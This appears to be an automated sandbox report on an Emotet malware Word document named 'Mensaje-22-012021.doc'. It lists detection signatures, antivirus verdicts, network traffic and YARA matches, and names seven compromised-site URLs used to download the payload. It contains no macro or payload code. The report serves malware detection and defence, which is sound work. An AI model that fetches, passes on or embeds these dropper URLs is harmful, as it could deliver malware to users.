Analysis Report Mensaje-22-012021.doc

Overview

General Information

Sample Name:	Mensaje-22-012021.doc
Analysis ID:	343897
MD5:	5023f52efbf71865041baf66ae8411cb
SHA1:	dc2aabc9b019199d32c000a8e18e63cafa4fbfd3
SHA256:	f4f41ebd2b517564f8764fa21faa2b1a824694e29cb31a2f149245e7bd42ab24
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected Emotet

Creates processes via WMI

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Document contains an embedded VBA with many string operations indicating source code obfuscation

Encrypted powershell cmdline option found

Hides that the sample has been downloaded from the Internet (zone.identifier)

Obfuscated command line found

Potential dropper URLs found in powershell memory

Sigma detected: Suspicious Call by Ordinal

Sigma detected: Suspicious Encoded PowerShell Command Line

Suspicious powershell command line found

Very long command line found

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Enables debug privileges

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Signatures

AV Detection:

Antivirus detection for URL or domain

Source: https://fifacoinsbox.com/wp-content/7gYt/	Avira URL Cloud: Label: malware
Source: http://yourcleanersurfaces.com/four-monks-acasz/O2my/	Avira URL Cloud: Label: malware
Source: http://www.91yudao.com/wp-admin/KKHt1/	Avira URL Cloud: Label: malware
Source: http://seamart.info/alfacgiapi/q92A/	Avira URL Cloud: Label: malware
Source: https://rbdck.com/wp-content/uploads/sucuri/lewfK/	Avira URL Cloud: Label: malware
Source: http://uagritech.com/cgi-bin/a5G/	Avira URL Cloud: Label: malware
Source: http://laymancoder.com/rustic-decor-1gbad/Us/	Avira URL Cloud: Label: malware
Source: http://seamart.info/alfacgiapi/q92A/P	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: www.91yudao.com	Virustotal: Detection: 7%			Perma Link
Source: yourcleanersurfaces.com	Virustotal: Detection: 9%			Perma Link

Multi AV Scanner detection for submitted file

Source: Mensaje-22-012021.doc	Virustotal: Detection: 61%	Perma Link
Source: Mensaje-22-012021.doc	Metadefender: Detection: 32%	Perma Link
Source: Mensaje-22-012021.doc	ReversingLabs: Detection: 62%

Antivirus or Machine Learning detection for unpacked file

Source: 24.2.rundll32.exe.10000000.0.unpack

Avira: Label: TR/Spy.Gen

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdb\d source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.pdbge source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: m.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2156319928.0000000002030000.00000002.00000001.sdmp
Source:	Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.2166153027.00000000028C7000.00000004.00000040.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: uagritech.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 162.241.253.129:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 162.241.253.129:80

Networking:

Potential dropper URLs found in powershell memory

Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp

String found in memory: http://uagritech.com/cgi-bin/a5G/!http://www.91yudao.com/wp-admin/KKHt1/!http://yourcleanersurfaces.com/four-monks-acasz/O2my/!http://laymancoder.com/rustic-decor-1gbad/Us/!https://rbdck.com/wp-content/uploads/sucuri/lewfK/!https://fifacoinsbox.com/wp-content/7gYt/!http://seamart.info/alfacgiapi/q92A/

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /cgi-bin/a5G/ HTTP/1.1Host: uagritech.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: uagritech.com
Source: global traffic	HTTP traffic detected: GET /four-monks-acasz/O2my/ HTTP/1.1Host: yourcleanersurfaces.comConnection: Keep-Alive

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: HVC-ASUS HVC-ASUS
Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View	ASN Name: TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{51E1E6FE-FC7D-43F0-B5EC-EA333295AFA3}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /cgi-bin/a5G/ HTTP/1.1Host: uagritech.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: uagritech.com
Source: global traffic	HTTP traffic detected: GET /four-monks-acasz/O2my/ HTTP/1.1Host: yourcleanersurfaces.comConnection: Keep-Alive

Source: rundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: uagritech.com

Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: rundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp	String found in binary or memory: http://laymancoder.com/rustic-decor-1gbad/Us/
Source: rundll32.exe, 00000006.00000002.2180009760.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2174175186.0000000000A67000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183809950.0000000002307000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2180009760.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2174175186.0000000000A67000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183809950.0000000002307000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000005.00000002.2165767085.0000000002460000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp	String found in binary or memory: http://seamart.info/alfacgiapi/q92A/
Source: powershell.exe, 00000005.00000002.2167131717.0000000002D44000.00000004.00000001.sdmp	String found in binary or memory: http://seamart.info/alfacgiapi/q92A/P
Source: rundll32.exe, 00000006.00000002.2180009760.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2174175186.0000000000A67000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183809950.0000000002307000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2169891604.0000000003BF2000.00000004.00000001.sdmp	String found in binary or memory: http://uagritech.com
Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2170760587.000000001B54A000.00000004.00000001.sdmp	String found in binary or memory: http://uagritech.com/cgi-bin/a5G/
Source: powershell.exe, 00000005.00000002.2169891604.0000000003BF2000.00000004.00000001.sdmp	String found in binary or memory: http://uagritech.com/cgi-sys/suspendedpage.cgi
Source: rundll32.exe, 00000006.00000002.2180009760.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2174175186.0000000000A67000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183809950.0000000002307000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2165767085.0000000002460000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2184265558.00000000027D0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmp	String found in binary or memory: http://www.91yudao.com
Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp	String found in binary or memory: http://www.91yudao.com/wp-admin/KKHt1/
Source: rundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2180009760.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2174175186.0000000000A67000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183809950.0000000002307000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2179867646.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2172743149.0000000000880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2183679232.0000000002120000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2155549875.0000000000294000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2155549875.0000000000294000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerv
Source: rundll32.exe, 0000000A.00000002.2207336767.0000000002120000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmp	String found in binary or memory: http://yourcleanersurfaces.com
Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp	String found in binary or memory: http://yourcleanersurfaces.com/four-monks-acasz/O2my/
Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp	String found in binary or memory: https://fifacoinsbox.com/wp-content/7gYt/
Source: powershell.exe, 00000005.00000002.2169802370.0000000003AE8000.00000004.00000001.sdmp	String found in binary or memory: https://rbdck.com/wp-content/uploads/sucuri/lewfK/
Source: powershell.exe, 00000005.00000002.2169902002.0000000003C0F000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0D

E-Banking Fraud:

Yara detected Emotet

Source: Yara match	File source: 00000014.00000002.2315698763.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2216468622.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2216501392.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2272217705.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2351060980.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2217285925.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2250563386.0000000000700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2208899018.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2343132705.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2328304138.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2228390631.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2315683097.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2345794337.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2253405198.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2184720444.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2171985440.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2272239255.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2193942063.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2260117902.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2293149466.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2172275535.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2326497204.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2198337513.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2326554651.0000000000300000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2206030341.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2343180402.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2183134792.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2183096664.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2205979964.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2294420728.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2228409491.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2293169935.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2250329618.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2282637087.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2351041899.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2261000236.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2305216199.0000000000130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2230214108.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2305247507.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2179031474.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2239275661.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2193919576.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2260083486.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2283433880.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2318576557.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2351778015.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2239237660.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2275876666.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2306105928.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2282670574.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2240182511.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 12.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.2b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.6d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.260000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.300000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.190000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.130000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.270000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.6d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.220000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.190000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.190000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.700000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.290000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.rundll32.exe.190000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE
